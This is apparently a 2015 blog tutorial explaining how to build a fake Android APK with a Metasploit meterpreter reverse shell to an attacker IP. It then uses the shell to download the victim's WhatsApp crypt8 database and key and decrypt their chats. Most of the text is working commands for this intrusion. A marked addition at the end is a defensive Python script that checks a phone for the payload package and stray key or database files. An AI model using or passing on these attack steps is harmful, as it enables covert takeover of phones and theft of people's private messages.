
Monday, October 5, 2015

How To Remotely Decrypt The WhatsApp Database "crypt8"

Before starting the database decryption process, first obtain remote access to the Android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ LHOST = attacker IP address, LPORT = local port ]
This command generates fake.apk in the home directory.

2. Type: msfconsole
This command starts the Metasploit Framework.

3. Type: use exploit/multi/handler
This loads the handler module, which can manage multiple sessions on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This sets the payload that makes the reverse connection from the victim device to the attacker's computer.

5. Type: show options
It shows the available options, such as LHOST and LPORT.

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT


Now run the app created in step 1 on your Android phone and you'll get a meterpreter session.


After getting the meterpreter session, type the commands below to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (lists the contents of the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded; now we need the key to decrypt it.
Use the commands below to obtain the key for the database:
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(This copies the file 'key' to the sdcard > Download folder.)

After obtaining the database and key, download the simple GitHub tool to decrypt the database:
  • Open the application (in windows).
  • Click File, then 'Decrypt .crypt8'.
  • In the box, provide the Key file and Database.
  • Click OK; a 'msgstore.decrypted' file will appear on your desktop.

  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the decrypted file generated on the desktop; leave the Account name and the 'wa.db' fields blank.
  • Click 'OK'
  • Now you will see the contact numbers with the chat details.
Note: A rooted smartphone is required to obtain the database and key from the device.
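
From the defender's side, the steps above leave artifacts on the handset that a triage script can look for in a package list and a shared-storage file listing. The following is an added example, not part of the original post: it assumes `com.metasploit.stage` as the package name of an unmodified Metasploit Android payload (not stated on the page), runs on constructed sample inputs, and also flags database copies outside WhatsApp's own folder, which goes beyond the steps shown.

```python
import fnmatch
import posixpath
import re

# Assumption (not on the page): package name of an unmodified Metasploit
# Android payload APK such as the fake.apk built in step 1.
SUSPECT_PACKAGES = {"com.metasploit.stage"}
SHARED_ROOTS = ("/sdcard/", "/mnt/sdcard/", "/storage/emulated/0/")
# Lives in /data/data/com.whatsapp/files/ and should never be on shared storage.
PRIVATE_NAMES = {"key"}
PKG_LINE = re.compile(r"^package:(?:(?P<apk>.+)=)?(?P<name>[\w.]+)$")

def parse_packages(pm_output):
    """Parse `pm list packages [-f]` output into {package: apk path or None}."""
    pkgs = {}
    for line in pm_output.splitlines():
        m = PKG_LINE.match(line.strip())
        if m:
            pkgs[m.group("name")] = m.group("apk")
    return pkgs

def triage(pm_output, shared_files):
    """Return (finding, detail) tuples for artifacts of the procedure above."""
    findings = []
    installed = parse_packages(pm_output)
    for name in sorted(installed.keys() & SUSPECT_PACKAGES):
        findings.append(("payload-package", name))
    for path in shared_files:
        norm = posixpath.normpath(path)
        if not norm.startswith(SHARED_ROOTS):
            continue
        base, folder = posixpath.basename(norm), posixpath.dirname(norm)
        if base in PRIVATE_NAMES:
            findings.append(("private-file-on-shared-storage", norm))
        elif (fnmatch.fnmatchcase(base, "msgstore*.crypt*")
              and not folder.endswith("/WhatsApp/Databases")):
            findings.append(("database-copy", norm))
    return findings

# Constructed sample inputs (not taken from a real device).
SAMPLE_PM = """\
package:/data/app/com.whatsapp-1/base.apk=com.whatsapp
package:/data/app/com.metasploit.stage-1/base.apk=com.metasploit.stage
package:com.android.browser
"""
SAMPLE_FILES = ["/sdcard/WhatsApp/Databases/msgstore.db.crypt8",
                "/sdcard/Download/key",
                "/sdcard/Download/backup/msgstore.db.crypt8",
                "/sdcard/DCIM/Camera/IMG_0001.jpg"]
```

A renamed or repackaged payload will not match the package check, so the file-based findings are the more durable signal.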